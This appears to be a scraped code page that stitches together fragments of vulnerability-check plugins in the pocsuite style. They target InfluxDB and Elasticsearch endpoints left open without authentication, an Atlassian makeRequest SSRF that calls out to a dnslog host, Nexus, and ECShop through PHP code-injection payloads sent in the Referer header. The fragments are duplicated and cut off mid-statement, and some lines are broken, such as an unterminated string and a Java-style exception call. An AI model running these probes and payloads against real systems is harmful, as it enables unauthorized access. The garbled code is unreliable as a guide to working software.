Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
def get_vul_url(self, p_url, p_headers):
r = req.get(p_url, verify=False, headers=p_headers, allow_redirects=False)
capa_id = ""
if r.status_code == 200:
if r.json():
for j in r.json():
if j['capability']['typeId'] == "yum":
print("[*] Vulnerable id is: {0}".format(j['capability']['id']))
capa_id = j['capability']['id']
elif r.status_code == 401:
print("[!] User credentials wrong! Quit!")
sys.exit()
p_vul_url = p_url + "/" + capa_id
return p_vul_url
def _verify(self):
result={}
vul_url = self.url
target_url = vul_url
PING_PATH = '/ping'
PING_URL = vul_url + PING_PATH
QUERY_PATH = '/query?q=show%20users'
QUERY_URL = vul_url + QUERY_PATH
try:
resp = req.get(PING_URL)
# 从响应头判断确实是InfluxDB
if resp.status_code == 204 and "x-influxdb-version" in resp.headers:
resp = req.get(QUERY_URL)
str_resp_json = str(resp.json())
# 响应头为200 且json响应字符串包含columns和user,则认为查询成功
if resp.status_code == 200 and 'columns' in str_resp_json and 'user' in str_resp_json:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
except Exception as e:
print(e)
target_url = vul_url
# 传入True参数,得到host和port,参考:https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/lib/utils/__init__.py
#host, port = url2ip(target_url, True)
# 根路径访问
ROOT_PATH = '/'
ROOT_URL = vul_url + ROOT_PATH
# /_cat路径访问
QUERY_PATH = '/_cat'
QUERY_URL = vul_url + QUERY_PATH
try:
resp = req.get(ROOT_URL)
# 1, 响应体里是否含有`You Know, for Search`,Content-Type是否为'application/json'
if resp.status_code == 200 and 'application/json' in resp.headers['Content-Type'].lower():
resp = req.get(QUERY_URL)
# 2, 响应码为200 且响应中包含`/_cat/master`
if resp.status_code == 200 and '/_cat/master' in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
except Exception as e:
print(e)
traceback.print_stack()
def _verify(self):
result={}
vul_url = self.url
payload = 'ip.cn:80' # 换成dnslog的地址
target_url = "{0}/plugins/servlet/gadgets/makeRequest?url={0}@{1}".format(vul_url, payload)
headers = {"X-Atlassian-Token": "no-check"}
try:
req.get(target_url, headers = headers, proxies=self.proxies, verify=False)
except Exception as e:
e.printStackTrace()
time.sleep(2) # 休眠2s等待ceye生成记录
if self.test_dnslog(self.CEYE_URL):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
ec2payload = self.gen_ec2payload(phpcode)
# ECShop 3.x payload
ec3payload = self.gen_ec3payload(phpcode)
option = self.get_option("app_version")
if option == "Auto":
payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
elif option == "2.x":
payloads = [(ec2payload, '2.x')]
elif option == '3.x':
payloads = [(ec3payload, '3.x')]
# payloads = [ec2payload, ec3payload]
for payload in payloads:
headers = {'Referer': payload[0]}
resp = requests.get(url, headers=headers)
r = get_middle_text(resp.text, '''<input value="''', " name="back_act" type="hidden">")
if r:
return r
r = get_middle_text(resp.text, '''
target_url = vul_url
PING_PATH = '/ping'
PING_URL = vul_url + PING_PATH
QUERY_PATH = '/query?q=show%20users'
QUERY_URL = vul_url + QUERY_PATH
try:
resp = req.get(PING_URL)
# 从响应头判断确实是InfluxDB
if resp.status_code == 204 and "x-influxdb-version" in resp.headers:
resp = req.get(QUERY_URL)
str_resp_json = str(resp.json())
# 响应头为200 且json响应字符串包含columns和user,则认为查询成功
if resp.status_code == 200 and 'columns' in str_resp_json and 'user' in str_resp_json:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
return self.save_output(result)
except Exception as e:
print(e)
traceback.print_stack()
return self.save_output(result)